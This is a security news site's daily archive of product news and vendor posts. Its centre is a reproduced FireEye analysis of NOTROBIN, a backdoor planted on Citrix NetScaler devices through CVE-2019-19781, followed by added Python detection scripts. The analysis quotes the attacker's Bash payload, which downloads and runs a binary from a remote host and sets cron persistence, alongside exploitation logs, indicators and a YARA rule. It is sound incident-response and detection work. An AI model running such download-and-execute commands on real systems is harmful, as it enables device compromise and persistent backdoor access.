Daily Archives: January 16, 2020

IoT cybersecurity’s worst kept secret

By improving access to data and taking advantage of them in fundamentally different ways to drive profitability, IT security executives are rapidly changing perceptions of their office. Although making better sense of and use of data may be standard fare in other areas of the enterprise, who knew that modern IoT cybersecurity solutions would become network security’s newest professional lever? Actually, we should have seen it coming, because digital transformation always starts with visibility and … More

The post IoT cybersecurity’s worst kept secret appeared first on Help Net Security.

New infosec products of the week: January 17, 2020

Masergy Shadow IT Discovery: Automatically identify unauthorized SaaS applications Masergy Shadow IT Discovery immediately scans and identifies all applications, providing clients visibility through the SD-WAN management portal. Until now, IT departments have had to rely on a variety of endpoint security solutions and guesswork to access this information. The time savings and decreased threat exposure will help IT organizations increase their security posture and keep up with the blind spots created by unsanctioned usage. STEALTHbits … More


How to govern cybersecurity risk at the board level

Rapidly evolving cybersecurity threats are now commanding the attention of senior business leaders and boards of directors and are no longer only the concern of IT security professionals. A report from University of California, Berkeley’s Center for Long-Term Cybersecurity (CLTC) and Booz Allen Hamilton uses insights gleaned from board members with over 130 years of board service across nine industry sectors to offer guidance for boards of directors in managing cybersecurity within large global companies. … More


Worldwide IT spending to total $3.9 trillion in 2020

Worldwide IT spending is projected to total $3.9 trillion in 2020, an increase of 3.4% from 2019, according to the latest forecast by Gartner. Global IT spending is expected to cross into $4 trillion territory next year. “Although political uncertainties pushed the global economy closer to recession, it did not occur in 2019 and is still not the most likely scenario for 2020 and beyond,” said John-David Lovelock, distinguished research vice president at Gartner. “With … More


2020 Trend Alert: Consumer Privacy


We are only a few weeks into 2020, and it is safe to say that consumer privacy is all the rage. California kicked off the movement with the California Consumer Privacy Act (CCPA), AB 375, which went into effect on January 1, 2020. The act aims to give consumers more rights over their personal data. Since then, Washington, New Hampshire, and New York have all proposed similar consumer privacy bills that – if passed – will have an effect not only on consumers, but also on businesses that operate in these states.

Take a look at the bills, then consider the steps your business can take to help comply with the regulations.

California Consumer Privacy Act

The newly established rights allow consumers to request records of what personal data is collected, to demand deletion of that information, and to require that its sale cease. The privacy act also regulates the data collected from minors and prevents businesses from discriminating against consumers who choose to exercise their rights.

Businesses that must adhere to the CCPA are those that collect personal data, conduct business in California, and fit into one or more of the following categories:

  • Gross annual revenue over $25 million
  • Buys, sells, or obtains the personal data of more than 50,000 consumers, devices, or households
  • Makes over 50 percent of its revenue from selling consumers’ data

To further empower consumers, CCPA has also mandated data brokers to register with the Attorney General, providing information about who they are and what their collection practices entail. This information is loaded into a database and is accessible to all consumers. 

Washington Privacy Act

On January 13, 2020, Washington State Senator Reuven Carlyle introduced the bill for the Washington Privacy Act (WPA), SB 5376. If passed, the bill will allow residents to see who is accessing their personal data, correct or delete data, or opt out of targeted advertising and profiling. Controllers will need to conduct data protection assessments covering where they process personal data, and additional assessments any time there is a change to the processing that could affect consumers. The bill will also require companies to disclose data management policies to increase transparency, and it will establish limits on the use of facial recognition technology.

New Hampshire Privacy Act

Garrett Muscatel and Greg Indruk, U.S. State Representatives, reintroduced the bill for the Act Relative to the Collection of Personal Information by Businesses, HB 1680, to the New Hampshire House of Representatives. The bill, if passed, will give consumers the right to access, transfer, and delete their personal information, or deny the sale of such information. It will also give consumers the right to take action if their information is leaked. Like CCPA, the bill would apply to any legal entity that has annual gross revenues over $25,000,000, processes data of more than 50,000 New Hampshire consumers, or derives 50 percent of its revenue from selling personal information.

New York Privacy Act

The New York Privacy Act, SB 5642, was sent to the Senate Standing Committee on Consumer Protection on January 8, 2020. If approved, the bill will improve transparency, add protections, and allow for action over the handling of personal data. Personal data will include biometric information and internet or electronic network activity.

What steps can you take to protect your clients and your business?

These regulations, and others like the EU GDPR, signal that protecting and securing consumer data will increasingly be required, and application security plays a role in that requirement. Whether you are looking to expand your application security (AppSec) program to further comply with the new regulations, or you are looking to start your first AppSec program, we can help. Our Veracode Verified program gives you a clear AppSec roadmap to follow, helping to ensure that security is woven into your development process.

In addition, by participating in the program, you can earn a Veracode Verified seal, which demonstrates to customers that you are dedicated to securing your applications and protecting their personal data.

Contact us today to learn how to better secure your applications to comply with industry standards.

SecureLink simplifies vendor privileged access management for healthcare organizations

SecureLink, the leader in vendor privileged access management (VPAM), released SecureLink for Healthcare to provide hospitals and healthcare organizations a centralized solution for managing privileged access for third-party vendors. It is customized to meet the needs of organizations operating under HIPAA and HITECH regulations and gives network administrators the ability to limit access to specific systems and applications, while providing a full video audit and keystroke logging of sessions. As part of the offering, SecureLink … More


Cloudflare for Campaigns protects political campaigns against cyberattacks and election interference

Cloudflare, the security, performance, and reliability company helping to build a better Internet, announced it will be offering free security services to help political campaigns in the United States and around the world defend against cyberattacks and election interference. The Cloudflare for Campaigns program will allow any eligible campaign to access a variety of the company’s security services including enhanced firewall protection, denial-of-service (DDoS) attack mitigation, as well as internal data management and security controls. … More


DataVisor dEdge: Uncover known and unknown attacks early

DataVisor announced the availability of dEdge, an anti-fraud solution that detects malicious devices in real-time, empowering organizations to uncover known and unknown attacks early, and take action with confidence. Fraud detection today spans multiple vectors. With growing adoption of mobile devices and the emergence of the always-on economy, by many measures, when organizations realize that they have been subject to a cyber-attack, it is already too late. Modern fraud detection and prevention require a transformational … More


CloudNine Collection Manager: Data extraction solution for Office 365 emails and OneDrive files

CloudNine launches CloudNine Collection Manager, a breakthrough data extraction solution from the global electronic discovery technology provider. Installed in minutes, Collection Manager defensibly performs native data collections from Office 365 (O365) email custodians, as well as Microsoft OneDrive cloud storage files. Collection Manager is easy enough for first-time collectors, yet powerful enough for discovery professionals. Collection Manager quickly and securely connects to O365 and OneDrive data sources, including documents linked from email messages, which few … More


404 Exploit Not Found: Vigilante Deploying Mitigation for Citrix NetScaler Vulnerability While Maintaining Backdoor

As noted in Rough Patch: I Promise It'll Be 200 OK, our FireEye Mandiant Incident Response team has been hard at work responding to intrusions stemming from the exploitation of CVE-2019-19781. After analyzing dozens of successful exploitation attempts against Citrix ADCs that did not have the Citrix mitigation steps implemented, we’ve recognized multiple groups of post-exploitation activity. Within these, something caught our eye: one particular threat actor that’s been deploying a previously-unseen payload for which we’ve created the code family NOTROBIN.

Upon gaining access to a vulnerable NetScaler device, this actor cleans up known malware and deploys NOTROBIN to block subsequent exploitation attempts! But all is not as it seems, as NOTROBIN maintains backdoor access for those who know a secret passphrase. FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign.

Initial Compromise

This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device. They issue an HTTP POST request from a Tor exit node to transmit the payload to the vulnerable newbm.pl CGI script. For example, Figure 1 shows a web server access log entry recording exploitation:

127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST
/vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"

Figure 1: Web log showing exploitation

Unlike other actors, this actor appears to exploit devices using a single HTTP POST request that results in an HTTP 304 response—there is no observed HTTP GET to invoke staged commands. Unfortunately, we haven’t recovered the POST body contents to see how it works. In any case, exploitation causes the Bash one-liner shown in Figure 2 to run on the compromised system:

pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k
hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o
/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * *
/var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

Figure 2: Bash exploit payload

This is the same methodology as described in Rough Patch: I Promise It'll Be 200 OK. The effects of this series of commands include:

  1. Kill and delete all running instances of netscalerd—a common process name used for cryptocurrency mining utilities deployed to NetScaler devices.
  2. Create a hidden staging directory /tmp/.init, download NOTROBIN into it, and set the execute permission.
  3. Install /var/nstmp/.nscache/httpd for persistence via the cron daemon. This is the path to which NOTROBIN will copy itself.
  4. Execute NOTROBIN directly.

There’s a lot to unpack here. Of note, the actor removes malware known to target NetScaler devices via the CVE-2019-19781 vulnerability. Cryptocurrency miners are generally easy to identify—just look for the process utilizing nearly 100% of the CPU. By uninstalling these unwanted utilities, the actor may hope that administrators overlook an obvious compromise of their NetScaler devices.

The actor uses curl to fetch NOTROBIN from the hosting server with IP address 95.179.163[.]186, which appears to be an abandoned WordPress site. FireEye has identified many payloads hosted on this server, each named after its embedded authentication key. Interestingly, we haven’t seen reuse of the same payload across multiple clients. Compartmentalizing payloads indicates the actor is exercising operational security.

FireEye has recovered cron syslog entries, such as those shown in Figure 3, that confirm the persistent installation of NOTROBIN. Note that these entries appear just after the initial compromise. This is a robust indicator of compromise to triage NetScaler devices.

Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]:
(nobody) CMD (/var/nstmp/.nscache/httpd)

Figure 3: cron log entry showing NOTROBIN execution

Now, let’s turn our attention to what NOTROBIN does.

Analysis of NOTROBIN

NOTROBIN is a utility written in Go 1.10 and compiled to a 64-bit ELF binary for BSD systems. It periodically scans for and deletes files matching filename patterns and content characteristics. The purpose seems to be to block exploitation attempts against the CVE-2019-19781 vulnerability; however, FireEye believes that NOTROBIN provides backdoor access to the compromised system.

When executed, NOTROBIN ensures that it is running from the path /var/nstmp/.nscache/httpd. If not, the utility copies itself to this path, spawns the new copy, and then exits. This provides detection cover by migrating the process from /tmp/, a suspicious place for long-running processes to execute, to an apparently NetScaler-related, hidden directory.

Now the fun begins: it spawns two routines that periodically check for and delete exploits.

Every second, NOTROBIN searches the directory /netscaler/portal/scripts/ for entries created within the last 14 days and deletes them, unless the filename or file content contains a hardcoded key (example: 64d4c2d3ee56af4f4ca8171556d50faa). Open source reporting indicates that some actors write scripts into this directory after exploiting CVE-2019-19781. Therefore, we believe that this routine cleans the system of publicly known payloads, such as PersonalBookmark.pl.

Eight times per second, NOTROBIN searches for files with an .xml extension in the directory /netscaler/portal/templates/. This is the directory into which exploits for CVE-2019-19781 write templates containing attacker commands. NOTROBIN deletes files that contain either of the strings block or BLOCK, which likely match potential exploit code, such as that found in the ProjectZeroIndia exploit; however, the utility does not delete files with a filename containing the secret key.

FireEye believes that actors deploy NOTROBIN to block exploitation of the CVE-2019-19781 vulnerability while maintaining backdoor access to compromised NetScaler devices. The mitigation works by deleting staged exploit code found within NetScaler templates before it can be invoked. However, when the actor provides the hardcoded key during subsequent exploitation, NOTROBIN does not remove the payload. This lets the actor regain access to the vulnerable device at a later time.

Across multiple investigations, FireEye observed actors deploying NOTROBIN with unique keys. For example, we’ve recovered nearly 100 keys from different binaries. These look like MD5 hashes, though FireEye has been unsuccessful in recovering any plaintext. Using complex, unique keys makes it difficult for third parties, such as competing attackers or FireEye, to easily scan for NetScaler devices “protected” by NOTROBIN. This actor follows a strong password policy!

Based on strings found within NOTROBIN, the actor appears to inject the key into the Go project using source code files named after the key. Figure 4 and Figure 5 show examples of these filenames.

/tmp/b/.tmpl_ci/64d4c2d3ee56af4f4ca8171556d50faa.go

Figure 4: Source filename recovered from NOTROBIN sample

/root/backup/sources/d474a8de77902851f96a3b7aa2dcbb8e.go

Figure 5: Source filename recovered from NOTROBIN sample

We wonder if “tmpl_ci” refers to a Continuous Integration setup that applies source code templating to inject keys and build NOTROBIN variants. We also hope the actor didn’t have to revert to backups after losing the original source!

Outstanding Questions

NOTROBIN spawns a background routine that listens on UDP port 18634 and receives data; however, it drops the data without inspecting it. You can see this logic in Figure 6. FireEye has not uncovered a purpose for this behavior, though DCSO makes a strong case for this being used as a mutex, as only a single listener can be active on this port.


Figure 6: NOTROBIN logic that drops UDP traffic

There is also an empty function, main.install_cron, whose implementation has been removed; alternatively, these may be vestiges of an early version of NOTROBIN. In any case, a NetScaler device listening on UDP port 18634 is a reliable indicator of compromise. Figure 7 shows an example of listing the open file handles on a compromised NetScaler device, including a socket listening on UDP 18634.


Figure 7: File handle listing of a compromised NetScaler device

NOTROBIN Efficacy

During one engagement, FireEye reviewed forensic evidence of NetScaler exploitation attempts against a single device, both before and after NOTROBIN was deployed by an actor. Prior to January 12, before NOTROBIN was installed, we identified successful attacks from multiple actors. But, across the following three days, more than a dozen exploitation attempts were thwarted by NOTROBIN. In other words, NOTROBIN inoculated the vulnerable device from further compromise. For example, Figure 8 shows a log message that records a failed exploitation attempt.

127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET
/vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-"
"curl/7.47.0"

Figure 8: Web log entry showing a failed exploitation attempt

Note that the application server responded with HTTP 404 (“Not Found”) as the second actor attempts to invoke their payload staged in the template wTyaINaDVPaw8rmh.xml. NOTROBIN deleted the malicious template shortly after it was created – and before it could be used by the other actor.
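The log evidence in Figures 1, 3 and 8 can be triaged at scale with a small classifier. The following is an added example, not FireEye's code: it parses constructed web access log and cron syslog lines (the three quoted in the post plus two benign ones), flags a traversal POST to newbm.pl as a staging attempt, flags a GET for a .xml template that returns 404 as an invocation blocked before use, and flags a cron execution of /var/nstmp/.nscache/httpd as NOTROBIN persistence. The function and field names are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Apache-style access log line, as in Figure 1 and Figure 8 of the post.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# cron syslog line, as in Figure 3 of the post.
CRON_RE = re.compile(r'cron\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>[^)]+)\)')

TRAVERSAL = "/vpn/../vpns/"            # CVE-2019-19781 traversal as it appears in the raw log
NOTROBIN_CRON_CMD = "/var/nstmp/.nscache/httpd"


@dataclass
class Finding:
    kind: str      # staging_attempt | invocation_blocked | invocation_attempt | traversal | notrobin_persistence
    detail: str
    line: str


def classify_access(line: str) -> Optional[Finding]:
    """Classify one access log line; None when it carries no traversal indicator."""
    m = ACCESS_RE.match(line)
    if not m or TRAVERSAL not in m.group("path"):
        return None
    method, path, status = m.group("method"), m.group("path"), int(m.group("status"))
    if method == "POST" and path.endswith("/scripts/newbm.pl"):
        # Figure 1: a single POST to newbm.pl; the 304 does not mean the attempt failed.
        return Finding("staging_attempt", f"POST to newbm.pl returned {status}", line)
    if method == "GET" and path.endswith(".xml"):
        if status == 404:
            # Figure 8: the staged template was already gone when the actor tried to invoke it.
            return Finding("invocation_blocked", "template not found (404)", line)
        return Finding("invocation_attempt", f"template fetch returned {status}", line)
    return Finding("traversal", f"{method} {path} -> {status}", line)


def classify_cron(line: str) -> Optional[Finding]:
    """Flag cron executions of the NOTROBIN persistence path (Figure 3)."""
    m = CRON_RE.search(line)
    if m and m.group("cmd").strip() == NOTROBIN_CRON_CMD:
        return Finding("notrobin_persistence",
                       f"cron ran {NOTROBIN_CRON_CMD} as {m.group('user')}", line)
    return None


def triage(lines) -> List[Finding]:
    """Run both classifiers over mixed access-log and syslog lines, preserving order."""
    findings = []
    for line in lines:
        f = classify_access(line) or classify_cron(line)
        if f:
            findings.append(f)
    return findings


# Constructed sample: the three lines quoted in the post plus two benign lines.
SAMPLE_LINES = [
    '127.0.0.2 - - [12/Jan/2020:21:55:19 -0500] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 304 - "-" "curl/7.67.0"',
    'Jan 12 21:57:00 <cron.info> foo.netscaler /usr/sbin/cron[73531]: (nobody) CMD (/var/nstmp/.nscache/httpd)',
    '127.0.0.2 - - [13/Jan/2020:05:09:07 -0500] "GET /vpn/../vpns/portal/wTyaINaDVPaw8rmh.xml HTTP/1.1" 404 48 "-" "curl/7.47.0"',
    '127.0.0.2 - - [13/Jan/2020:05:10:00 -0500] "GET /vpn/index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    'Jan 13 05:11:00 <cron.info> foo.netscaler /usr/sbin/cron[73540]: (root) CMD (/usr/sbin/newsyslog)',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f.kind:22} {f.detail}")
```

A 404 on a template GET only means the template was absent at that moment; pair it with the cron and file-system indicators before concluding NOTROBIN was the reason.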

FireEye has not yet identified if the actor has returned to NOTROBIN backdoors.

Conclusion

FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators that check into their devices after reading Citrix security bulletin CTX267027. NOTROBIN mitigates CVE-2019-19781 on compromised devices but retains a backdoor for an actor with a secret key. While we haven’t seen the actor return, we’re skeptical that they will remain a Robin Hood character protecting the internet from the shadows.

Indicators of Compromise and Discovery

Table 1 lists indicators that match NOTROBIN variants that FireEye has identified. The domain vilarunners[.]cat is the WordPress site that hosted NOTROBIN payloads. The domain resolved to 95.179.163[.]186 during the time of observed activity. As of January 15, vilarunners[.]cat resolves to a new IP address, 80.240.31[.]218.

IOC Item           | Value
-------------------|-----------------------------------------------------------
HTTP URL prefix    | hxxps://95[.]179.163.186/wp-content/uploads/2018/09/
Directory          | /var/nstmp/.nscache
Filename           | /var/nstmp/.nscache/httpd
Directory          | /tmp/.init
Filename           | /tmp/.init/httpd
Crontab entry      | /var/nstmp/.nscache/httpd
Listening UDP port | 18634
Remote IP          | 95.179.163[.]186
Remote IP          | 80.240.31[.]218
Domain             | vilarunners[.]cat

Table 1: Indicators of Compromise
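The host-based entries of Table 1 (the two directories and binaries, the crontab entry, the UDP 18634 listener, and the policed template and script directories) can be turned into checks that run against a copied-out or mounted device tree, a crontab listing and netstat -an output. This is an added example, not FireEye's or Citrix's tooling; the directory fixture it builds, the crontab text and the netstat lines are constructed, and the function names are my own.

```python
import re
import tempfile
import time
from pathlib import Path

# Host-based indicators from Table 1, as paths relative to the device root
# so the checks can run against a mounted image or a copied-out tree.
IOC_DIRS = ["var/nstmp/.nscache", "tmp/.init"]
IOC_FILES = ["var/nstmp/.nscache/httpd", "tmp/.init/httpd"]
IOC_CRON_CMD = "/var/nstmp/.nscache/httpd"
IOC_UDP_PORT = 18634
# Directories NOTROBIN polices (and exploits write to): anything created there
# recently deserves review, whether or not NOTROBIN removed it first.
WATCHED_DIRS = ["netscaler/portal/scripts", "netscaler/portal/templates"]


def check_paths(root):
    """Report the Table 1 directories and files that exist under root."""
    return [f"present: /{rel}" for rel in IOC_DIRS + IOC_FILES if (Path(root) / rel).exists()]


def check_crontab(crontab_text):
    """Report crontab entries whose command is the NOTROBIN persistence path."""
    hits = []
    for line in crontab_text.splitlines():
        fields = line.strip().split(None, 5)          # five time fields + command
        if (len(fields) == 6 and not fields[0].startswith("#")
                and fields[5].strip() == IOC_CRON_CMD):
            hits.append(f"crontab runs {IOC_CRON_CMD} at '{' '.join(fields[:5])}'")
    return hits


def check_udp_listeners(netstat_lines):
    """Report UDP sockets bound to 18634 in netstat -an output (BSD '*.port' or Linux 'addr:port')."""
    hits = []
    for line in netstat_lines:
        fields = line.split()
        if len(fields) >= 4 and fields[0].startswith("udp"):
            port = re.split(r"[.:]", fields[3])[-1]
            if port == str(IOC_UDP_PORT):
                hits.append(f"UDP listener on {fields[3]}")
    return hits


def recent_files(root, max_age_days=14, now=None):
    """List entries in the policed directories modified within max_age_days (NOTROBIN's own window)."""
    now = time.time() if now is None else now
    hits = []
    for rel in WATCHED_DIRS:
        d = Path(root) / rel
        if d.is_dir():
            for p in sorted(d.iterdir()):
                if now - p.stat().st_mtime <= max_age_days * 86400:
                    hits.append(f"recent: /{rel}/{p.name}")
    return hits


def triage(root, crontab_text, netstat_lines, now=None):
    """Run all checks; an empty list means none of the Table 1 host indicators were seen."""
    return (check_paths(root) + check_crontab(crontab_text)
            + check_udp_listeners(netstat_lines) + recent_files(root, now=now))


# Constructed fixture (not from the post): crontab and netstat text modelled on
# the crontab line in Figure 2 and the UDP listener described with Figure 7.
SAMPLE_CRONTAB = "# constructed crontab\n* * * * * /var/nstmp/.nscache/httpd\n0 3 * * * /usr/sbin/newsyslog\n"
SAMPLE_NETSTAT = [
    "Proto Recv-Q Send-Q Local Address          Foreign Address        (state)",
    "tcp4       0      0 *.443                  *.*                    LISTEN",
    "udp4       0      0 *.18634                *.*",
]


def build_demo_root():
    """Create a temporary fake device root with the planted indicators; returns its path."""
    root = Path(tempfile.mkdtemp(prefix="notrobin-demo-"))
    for rel in IOC_FILES:
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(b"placeholder, not the real binary")
    tmpl = root / "netscaler/portal/templates"
    tmpl.mkdir(parents=True)
    (tmpl / "wTyaINaDVPaw8rmh.xml").write_text("<constructed template/>")  # name from Figure 8
    return str(root)


if __name__ == "__main__":
    for hit in triage(build_demo_root(), SAMPLE_CRONTAB, SAMPLE_NETSTAT):
        print(hit)
```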

Discovery on VirusTotal

You can use the following VTI queries to identify NOTROBIN variants on VirusTotal:

  • vhash:"73cee1e8e1c3265c8f836516c53ae042"
  • vhash:"e57a7713cdf89a2f72c6526549d22987"

Note that the vHash implementation is private, so we’re not able to confirm why this technique works. In practice, the vHashes cover the same variants identified by the Yara rule listed in Figure 9.

rule NOTROBIN
{
    meta:
        author = "william.ballenthin@fireeye.com"
        date_created = "2020-01-15"
    strings:
        $func_name_1 = "main.remove_bds"
        $func_name_2 = "main.xrun"
    condition:
        all of them
}

Figure 9: Yara rule that matches on NOTROBIN variants

Recovered Authentication Keys

FireEye has identified nearly 100 hardcoded keys from NOTROBIN variants that the actor could use to re-enter compromised environments. We expect that these strings may be found within subsequent exploitation attempts, either as filenames or payload content. Although we won’t publish them here out of concern for our customers, please reach out if you’re looking for NOTROBIN within your environment and we can provide a list.

Acknowledgements

Thank you to analysts across FireEye that are currently responding to this activity, including Brandan Schondorfer for collecting and interpreting artifacts, Steven Miller for coordinating analysis, Evan Reese for pivoting across intel leads, Chris Glyer for reviewing technical aspects, Moritz Raabe for reverse engineering NOTROBIN samples, and Ashley Frazer for refining the presentation and conclusions.

Micro Focus AD Bridge 2.0: Extending security policies and access controls to cloud-based Linux

Micro Focus released Micro Focus AD Bridge 2.0, offering IT administrators the ability to extend Active Directory (AD) controls from on-premises resources, including Windows and Linux devices to the cloud – a solution not previously offered in the marketplace. With AD Bridge 2.0, organizations can leverage existing infrastructure authentication, security as well as policy, in order to simplify the migration of on-premises Linux Active Directory to the cloud, resulting in fully secured and managed Linux … More


52 hackers participate in ninth U.S. Department of Defense and HackerOne bug bounty program

Through partnership with the Defense Digital Service, the U.S. Department of Defense (DoD) and HackerOne, the number one hacker-powered pentesting and bug bounty platform, announced the results of the second Army bug bounty program, ‘Hack the Army 2.0’. The bug bounty challenge ran from October 9, 2019 to November 15, 2019 with more than 60 publicly accessible web assets, including *.army.mil, *.goarmy.mil, and the Arlington Cemetery website for the first time. Bug bounties are monetary … More


Visa invests in VGS to accelerate fintech innovation while advancing data security

Very Good Security (VGS), a leader in modern data security and custodianship, announced that it has received a strategic investment from Visa to expand access to VGS’ infrastructure-as-a-service for financial technology companies (fintechs) and large enterprises. Visa joins other notable investors, including Goldman Sachs, Andreessen Horowitz, Vertex Ventures US, and Max Levchin (co-founder of PayPal), in advancing VGS’ mission to provide a better approach to data security, privacy and compliance. Earlier this year, Visa selected … More


Tricentis acquires SpecFlow to extend support for the open source community

Tricentis, the leader in continuous testing for DevOps, announced that it has acquired SpecFlow, the biggest and most trusted BDD solution for .NET developers around the world. SpecFlow’s pragmatic approach to specification-by-example has helped agile development teams improve collaboration with business stakeholders to build and deliver higher quality software. SpecFlow will continue to remain a free, open source offering for the software development and testing communities. SpecFlow+, SpecFlow’s commercial offering, and SpecMap, an Azure DevOps … More


CyberLink integrates facial recognition engine into VIVOTEK’s IP surveillance solutions

VIVOTEK, the global leading IP surveillance solution provider, and CyberLink, a pioneer of AI and facial recognition technologies, announced they have entered into a strategic partnership, which will integrate CyberLink’s FaceMe AI facial recognition engine into VIVOTEK’s IP surveillance solutions. “Founded in 2000, VIVOTEK has been dedicated to the IP surveillance industry for 20 years. Entering the era of AIoT, we will continue global partnerships to accelerate and enhance video applications by joining forces with … More


White Ops appoints Rhushabh ‘Rush’ Mehta as Sr. VP of Engineering

White Ops, the global leader in bot mitigation verifying the humanity of more than 1 trillion digital interactions per week, announced the appointment of Rhushabh ‘Rush’ Mehta, former Head of Foundational Technology at Audible, an Amazon Company, to White Ops Sr. Vice President of Engineering. In his new role, Rush will lead White Ops’ development efforts to further accelerate the innovation of the White Ops Bot Mitigation platform and associated products including White Ops Advertising … More


Kathy Crusco joins Code42’s board of directors

Code42, the leader in insider threat detection and response, announced the appointment of Kathy Crusco to its board of directors. An enterprise software veteran, she currently serves on the board of directors at QAD, Poly (formerly Plantronics and Polycom), and Calix, and most recently served as chief financial officer at Kony, a cloud-based digital banking application and low-code platform solutions company. “We are pleased to welcome Kathy to Code42’s board of directors,” said Joe Payne, … More


The Basics of IGA ROI: How to Show Value in Identity Governance


Like most companies today, your business is likely facing increasing demands to support and protect more devices and systems that contain data critical to your business. You are spending increasing time and resources on manual, repetitive tasks for managing user accounts. And you are being squeezed by the business to do more with less.

What you need is a way to prove how investing in intelligent identity governance and administration (IGA) solutions brings value to your business and enables you to manage the identity chaos you face each day. Identity governance may be one of the smartest selections your team makes to address these challenges, so where do you start?

Let’s take a look at five foundational elements required for building the business case for identity governance, and for showing the value and ROI of identity governance solutions for your business.  
 

1) Understand the Impact to Cost, Compliance, and Risk Reduction

When it comes to showing the value of identity governance in your business, you need to demonstrate how your investment will impact three critical areas—cost, compliance, and risk reduction. Organizations that leverage leading identity governance and administration solutions, like those offered from Core Security, have realized the business benefits of investing in these solutions and the value they bring in:

  • Increasing efficiencies and reducing IT and business costs
  • Enhancing compliance, review, and certification processes
  • Improving security and mitigating risks

Incorporating these three elements in your business case requires research. Do your homework and take time to identify the financial impact and expected efficiencies gained from the investment. Clearly spell out how you can better meet compliance and industry standards. And while more difficult to quantify, try to articulate the value in mitigating risk across your organization.
 

2) Define the Specific Challenges You Want to Solve

It’s essential that you know the current state of your organization’s most pressing challenges with regard to identity governance and access management. This means clearly articulating the challenges you face today in relation to your own business and identifying the problems you are trying to address. Make sure you specifically can identify:

  • Who currently owns each process
  • What systems, users, and applications are involved
  • Where the greatest adverse impact is occurring
  • When and how long the challenges have been known
  • Why they present a major roadblock to your business

Once you have identified the most critical areas of your identity governance challenges, you need to draft a problem summary statement in a concise, succinct manner that quantifies the costs associated with your current issues. This statement should also take into account any gaps that exist from both a compliance perspective and risk perspective, identifying any potential implications that would result from not addressing these gaps.

Your description of this challenge should define the total resources required to support the initiative, including the number of full-time employees required, the number of users supported overall, and the total number of hours required to manage this process over a specific length of time. From a compliance perspective, you may have clear requirements that you must address from either an internal or external audit, so it’s important to identify those specifically. From a risk angle, you will want to consider the balance that exists between user efficiency and overall risk to the organization.
 

3) Articulate and Analyze Your Solution Approach

The next step for building a business case for identity governance is to fully research and identify the IGA solutions that will best meet your needs. Many leading organizations today conclude that a commercial-off-the-shelf (COTS) solution is best suited for their needs and recognize that these solutions are widely used by many organizations across their industry.

Once you have identified the type of automated identity governance solutions your organization requires to address your top access-related challenges, it is time to articulate your solution approach. Highlighting your solution approach statement involves providing an analysis of the overall costs associated with the new investment, identifying specifically what the solution will solve, the cost savings it will derive, and the project return on investment and overall payback period length. It should also include an analysis of how the solution will better meet regulatory compliance and describe how the solution can more effectively address the balance between overall risk and usability. Also be sure to specify when the recommended investment should begin upon approval and include key considerations for the investment.

4) Show, Don’t Just Tell

Showing the value of identity governance and overall ROI means you should take time to detail your calculations through graphs, tables, and charts where possible. Provide specific cost models, summary comparisons, and other figures that reinforce the statements you are drafting as part of your business case. Typically, this includes existing and proposed IT-related access costs, business-related access costs, total costs of access-related expenses, and proposed cost savings when the proposed identity governance solution is in effect. Showing how you can save the business time, money, and resources through tables and graphs is an ideal way to get your point across quickly and effectively.  

5) Back Up Your Recommendation

After your extensive analysis and evaluation, you must clearly state your recommendation with additional proof points to substantiate your decision. This means identifying the recommended partner, specifying the relevant solutions for investment, and providing a summary comparison of your current state versus the leading solution candidate. Showing the effects of the status quo versus the leading solution candidate will clearly reveal the results of your analysis. Providing a breakeven period and cumulative savings will further reinforce the value that your IGA solution will provide to the business.

It's Time to Build Your Case

Your organization can’t afford to put off such a critical investment. But leveraging an intelligent identity governance solution that mitigates risk and manages the complexity of your access challenges requires you to take the first step. Remember, an effective business case shows the value of the solution by directly correlating the outcomes of investment with benefits to the business from a cost, compliance, and risk perspective. Do the hard work required so you can show the ROI of identity governance even before you make the investment.  

Ready to get started in building your business case for identity governance?

Download our guide that provides step-by-step instructions and examples for making the case for identity governance in your organization. 

Windows Vulnerability: Researchers Demonstrate Exploits

'Proof of Concept' Code Released; Patching Urged
A day after the NSA disclosed a significant vulnerability that could affect the cryptographic operations in some versions of Windows, security researchers started releasing "proof of concept" code designed to show how attackers potentially could exploit the flaw. This highlights the urgency of patching.

Get in the Security Fast Lane with a Stealthwatch and Encrypted Traffic Analytics Test Drive!

As businesses continue to move towards a more digital future, the threats they face continue to become more complex. As many organizations continue to embrace the benefits of cloud, IoT, and an increasingly mobile workforce, threat actors are taking advantage of these attack vectors to work their way into your business.

Cisco Stealthwatch provides comprehensive network-wide visibility and security analytics, so you can stay ahead of attackers and expose their locations and behaviors to help you prevent a security event from becoming a full-blown breach. Today, we’re happy to announce that you’ll have the chance to get behind the wheel and give Stealthwatch a live test drive!

Before they become customers, many organizations we work with have never experienced what it’s like to gain insight into their networks and how they might use the power of behavioral analytics and machine learning to detect threats. Fortunately, Stealthwatch test drives are the perfect way to gain first-hand experience with Stealthwatch and how you can use its capabilities to do just that.

Here’s an example of what customers find on their networks:

The Cisco Stealthwatch Test Drive provides users with access to a fully configured environment with traffic that you generate to test first-hand live use cases, including:

  • Breach Detection
  • Insider and Advanced Threat Detection
  • High Risk Application Detection
